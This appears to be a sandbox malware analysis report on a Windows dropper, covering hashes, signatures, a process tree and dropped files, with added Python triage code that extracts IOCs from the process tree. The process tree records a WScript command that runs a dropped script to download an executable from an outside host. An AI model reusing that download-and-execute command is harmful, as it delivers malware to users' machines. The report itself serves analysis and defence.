Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    11-05-2024 21:49

General

  • Target

    36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    36b77f9deebcf77fcc62c6da9bc55994

  • SHA1

    0187da02d35ed149ecbb60da4e661ff7245bc9a7

  • SHA256

    488bbf10a6a87a7deb46fb030292cd646960b1af392c3fe0da5f288e895e585a

  • SHA512

    bd2d68caf1b56490726f4c325012b1eabf79e1dd737d1b8039a839625c4fb77b8536cac456007d4958f669eaf4fd9986318f6115b3738c035b48951dba44e227

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3L:/7BSH8zUB+nGESaaRvoB7FJNndn2

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2424
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe
      2⤵
      • Blocklisted process makes network request
      PID:1696
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe
      2⤵
      • Blocklisted process makes network request
      PID:2516
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe
      2⤵
      • Blocklisted process makes network request
      PID:2004
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe
      2⤵
      • Blocklisted process makes network request
      PID:2212
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe
      2⤵
      • Blocklisted process makes network request
      PID:2088
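
The process tree above shows one pattern worth automating in triage: a dropper running from the user's Temp directory writes a script (fuf2359.js) and launches WScript.exe with a download URL and an output .exe path as arguments, five times from the same parent. The Python below is an added illustration, not part of the sandbox report or its signature engine. It parses command lines transcribed from the Processes section, flags script-host launches that carry a URL, and collapses the repeated launches into a single IOC set. The event tuples are constructed from the report, and the heuristics (script-host image name, script argument under a Temp path, http(s) argument, .exe argument) are this example's own, not the sandbox's "Blocklisted process makes network request" logic.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Transcribed from the report's Processes section: (pid, parent pid, command line).
# Constructed input for this example; a real run would read the sandbox's JSON export.
TEMP = r"C:\Users\Admin\AppData\Local\Temp"
DROPPER = TEMP + r"\36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe"
WSCRIPT_CMD = (r'"C:\Windows\System32\WScript.exe" "' + TEMP + r'\fuf2359.js" '
               r'http://www.djapp.info/?dotnet=4&file=installer ' + TEMP + r'\fuf2359.exe')
PROCESS_EVENTS = [
    (2424, None, '"' + DROPPER + '"'),
    (1696, 2424, WSCRIPT_CMD),
    (2516, 2424, WSCRIPT_CMD),
    (2004, 2424, WSCRIPT_CMD),
    (2212, 2424, WSCRIPT_CMD),
    (2088, 2424, WSCRIPT_CMD),
]

SCRIPT_HOST_RE = re.compile(r"\\(wscript|cscript)\.exe$", re.IGNORECASE)
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf")


def split_cmdline(cmdline):
    """Split a Windows command line into arguments, keeping quoted paths whole."""
    return [a.strip('"') for a in re.findall(r'"[^"]*"|\S+', cmdline)]


def classify(pid, ppid, cmdline, cmd_by_pid):
    """Return an IOC record if this event is a script host invoked as a downloader."""
    args = split_cmdline(cmdline)
    if not SCRIPT_HOST_RE.search(args[0]):
        return None
    script = next((a for a in args[1:] if a.lower().endswith(SCRIPT_EXTS)), None)
    urls = [a for a in args[1:] if a.lower().startswith(("http://", "https://"))]
    payloads = [a for a in args[1:] if a.lower().endswith(".exe")]
    if script is None or not urls:
        return None
    return {
        "pid": pid,
        "ppid": ppid,
        "script": script,
        "script_in_temp": bool(TEMP_DIR_RE.search(script)),
        "parent_in_temp": bool(TEMP_DIR_RE.search(cmd_by_pid.get(ppid, ""))),
        "url": urls[0],
        "host": urlsplit(urls[0]).hostname,
        "payload": payloads[0] if payloads else None,
    }


def triage(events):
    """Flag script-host downloaders and collapse repeated launches into one IOC set."""
    cmd_by_pid = {pid: cmd for pid, _, cmd in events}
    hits = [h for h in (classify(pid, ppid, cmd, cmd_by_pid) for pid, ppid, cmd in events) if h]
    iocs = {
        "hosts": sorted({h["host"] for h in hits}),
        "urls": sorted({h["url"] for h in hits}),
        "dropped": sorted({h["script"] for h in hits} | {h["payload"] for h in hits if h["payload"]}),
    }
    # Same parent, script and URL relaunched: one downloader retrying, not N infections.
    launches = Counter((h["ppid"], h["script"], h["url"]) for h in hits)
    return hits, iocs, launches


if __name__ == "__main__":
    hits, iocs, launches = triage(PROCESS_EVENTS)
    for h in hits:
        print(f"pid {h['pid']} (parent {h['ppid']}): {h['host']} -> {h['payload']}")
    print("IOCs:", iocs)
    for (ppid, script, url), n in launches.items():
        print(f"parent {ppid} launched {script} against {url} {n} time(s)")
```

Two details in the tree matter when tuning a rule like this. The image path recorded for the children is C:\Windows\SysWOW64\WScript.exe while the command line names C:\Windows\System32\WScript.exe: the dropper is a 32-bit process (see the arch:x86 tag), so WOW64 file-system redirection maps its System32 reference to SysWOW64, and a detection keyed on the System32 image path alone would miss it. And the five launches from PID 2424 share one script and one URL, so they should be reported as a single downloader with a retry loop rather than five separate IOCs; note that the Downloads section below lists fuf2359.js but no fuf2359.exe.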

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    1KB

    MD5

    844a93e096b7ac8f56f9286642d59fed

    SHA1

    6bf7e649df885f4338d9b84864c4fb2c6d06d2ed

    SHA256

    5a344dea279de4e33fd977f55d63b9518cac5ad62e2e5cd09a81f56ced29eddb

    SHA512

    eea9f130fdbb0b0ad23e0fcfc25c14be2827cb641f1d1a6aa2097a1e8b9b81e8e3ebc5633f8fccac60039d361da971f1c5e1085371ca23bc0c3c125bdddd60df

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    724B

    MD5

    8202a1cd02e7d69597995cabbe881a12

    SHA1

    8858d9d934b7aa9330ee73de6c476acf19929ff6

    SHA256

    58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

    SHA512

    97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    410B

    MD5

    0211d032752fa7708b086e24c137de1d

    SHA1

    12b45877562914e3cfb39048063e0c843c00685a

    SHA256

    13fbd17d8c8560e991131140cec5536f896966671e94aac9105ec1332efae235

    SHA512

    4b31365df75c361febaff904246297f581f2ced3839f32f6d5e66a3855ed2a62f26550c2718ff6698c625774d55df4e9b71174e81e8e8fc319e6812edb959228

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    b7b1f8873696419f4364540ba5d6002b

    SHA1

    e86b49c21590e605d313f60e95554a879a405fb0

    SHA256

    31d9cf9b567a39c7db288431a2e0b3725aa976bf6dbb67afee5a233e7d71dfdc

    SHA512

    fabc8d079de03fae7eb9ef1d0b80b448c7673a3afdaadf484727dd4d4f2ea426af3375b8a4d8a98680ee837de64e22cfd593d02a9deaf318e13540d6efdf6dd2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    392B

    MD5

    abf22e1b086a79e5b39991bfe77196aa

    SHA1

    4bd5292871a129eee5bf3b0b579e499f67ac2218

    SHA256

    eb5464f9f4f99bf341ad6d1af1434656c53f6f58c1aba33b69ad5f70325a1850

    SHA512

    89adff9b30cf0110bb52a3a11eeb1eba1c4e61c1b38fe7fe69b26b337e3fe93590e05be187f2e920527dcaf24ecb2ba6c38dbb63352b4962b7cc5660f713e2c8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\domain_profile[1].htm

    Filesize

    40KB

    MD5

    bdd845e8776dc7d46e2f2755af60892e

    SHA1

    ba62ef4b89773dfa6753cd7c39e18388eff3ce33

    SHA256

    9bf90d3712349c7fb0bd2877923f98c77789e9bcbb7e544ba8e5d61fa6cdac3b

    SHA512

    81a661570ea1f82189365f3f9e6c31812a85bd92b65e674ae01df700c43225995a434c751ed710dd65ffd8e3c0091d58ed4d32e5de16b5873ea3cbd8286842ad

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\domain_profile[1].htm

    Filesize

    40KB

    MD5

    923ab9d2edf19ff3412e06d73dd1da77

    SHA1

    62ba6cf4214028d0c674f290679ea6f82b59d093

    SHA256

    28b7948b4a13b8c975a5cb08cfc9a90b1d6e63d95323a14e5a4e64744869555e

    SHA512

    25f49c4ffd6ca5adfc16bb6bb9bba89e16a1e18973cb4a854f43bfc287e0604f2ef6d7a746896c48cd3975b7445f1fbc1619a0ea7433ee5eaa7683e6df6f21fe

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\domain_profile[1].htm

    Filesize

    6KB

    MD5

    d615e9b74470164a6669f3b0ff787e7b

    SHA1

    3c6456e4dea05bd39b33f75a5a2e882f7b4edcdf

    SHA256

    05e71ae87c9bdfe255beac821c0371a3cc22e513cdc9c514149ece84b2804693

    SHA512

    9f6948eb84db3d60bd08291fb10989f559165401d00fc0e0f987b1dfd345abc6f7865b906b4c54c177289c80c9305f43fa5177db495c668d055e59860689b7f4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\domain_profile[1].htm

    Filesize

    40KB

    MD5

    b22769cfe4cd018b036d01cca9cd2837

    SHA1

    55e06bba7f4cab5f04127b38fece10affe5e0469

    SHA256

    dcd55a9dc7e5138fbca694f8486975fc38165439a69c4fb3eb6b305f18813d87

    SHA512

    1c5fdee0b441c1eb782f5f4f5808e2661a6971723d95adc68fdf5c0998859000cabb5c890e09474a3d4442b416d125258f670ee89501a40c73d7b0a9204ce4a7

  • C:\Users\Admin\AppData\Local\Temp\Cab8F25.tmp

    Filesize

    68KB

    MD5

    29f65ba8e88c063813cc50a4ea544e93

    SHA1

    05a7040d5c127e68c25d81cc51271ffb8bef3568

    SHA256

    1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

    SHA512

    e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

  • C:\Users\Admin\AppData\Local\Temp\TarB3F5.tmp

    Filesize

    177KB

    MD5

    435a9ac180383f9fa094131b173a2f7b

    SHA1

    76944ea657a9db94f9a4bef38f88c46ed4166983

    SHA256

    67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

    SHA512

    1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

  • C:\Users\Admin\AppData\Local\Temp\fuf2359.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\JFYKJRF7.txt

    Filesize

    175B

    MD5

    92451270d1ea8a013e1620e216fe5456

    SHA1

    d5b1b80f5991f9f201ea56900f02035193a837c1

    SHA256

    632d1aae8a74d32b7f006d1a78f0f5d41ee5ca97d5b730e997c0d00028ee0efb

    SHA512

    c63b2c1bd3d6faf275e182ee6ce0afbfbec869e33462ea94cd81abe76ed1409c4e188255afd686b42661320e8ba70e7dab565439d2ad5de72410a3357d23e9bb